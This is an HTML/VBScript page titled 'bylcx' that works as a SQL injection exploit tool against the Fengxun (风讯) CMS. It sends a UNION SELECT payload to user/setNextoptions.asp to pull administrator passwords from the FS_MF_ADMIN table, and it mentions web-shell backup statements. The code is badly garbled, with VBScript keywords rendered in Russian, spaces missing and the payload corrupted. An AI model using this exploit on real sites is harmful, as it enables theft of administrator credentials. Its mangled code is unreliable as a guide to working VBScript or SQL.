<Scriptlanguage = "vbscript">
Subwindow_onload
Window.Resizeto450,380
Window.moveto300 300
Заканчивая
</Script>
<Scriptlanguage = "vbscript">
Functiongethttppage (path)
t = getBody (path)
gethttppage = bytestobstr (t, "gb2312")
document.getElementbyId ("url"). innerText = gethttppage
Конечная функция
</script>
<Scriptlanguage = "vbscript">
Functiongetbody (url)
OnerRorResumenext
Setretrieval = createObject ("microsoft.xmlhttp")
Безрельтивел
.Open "Get", url, false "", "" "
.Отправлять
Getbody =. -Responsebody
Энд
Setretrieval = ничего
Конечная функция
Functionbytestobstr (тело, cset)
Dimobjstream
SetObjStream = createObject ("adodb.stream")
objstream.type = 1
objstream.mode = 3
objstream.open
objstream.writebody
objstream.position = 0
objstream.type = 2
objstream.charset = cset
Bytestobstr = objstream.readtext
objstream.close
Setobjstream = ничего
Конечная функция
</script>
<title> bylcx </title>
<inputId = "urlCode" name = "urlCode" size = "60" value = "http: // 风讯 url/user/setNextoptions.asp">
<selectId = "sql" name = "sql" onchange = vbs: gethttppage (document.getelementbyid ("urlcode"). value+document.getElementById ("sql"). Value)>
<optionvalue = ""> 风讯 SQL 版注入 , 至于其它备份 оболочка 的语句懒得写了 </option>
OptionValue = "? equvalue = 1 & reqsql = select%201, admin_pass_word, 3,4,5,6,7,8,9,10,11,12,13,14,15,17,18,19,20,21 22,23,24,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20FROM%20FS_MF_ADMIN%20HIWERT%= 1-")"> 暴管理员密码 </Option>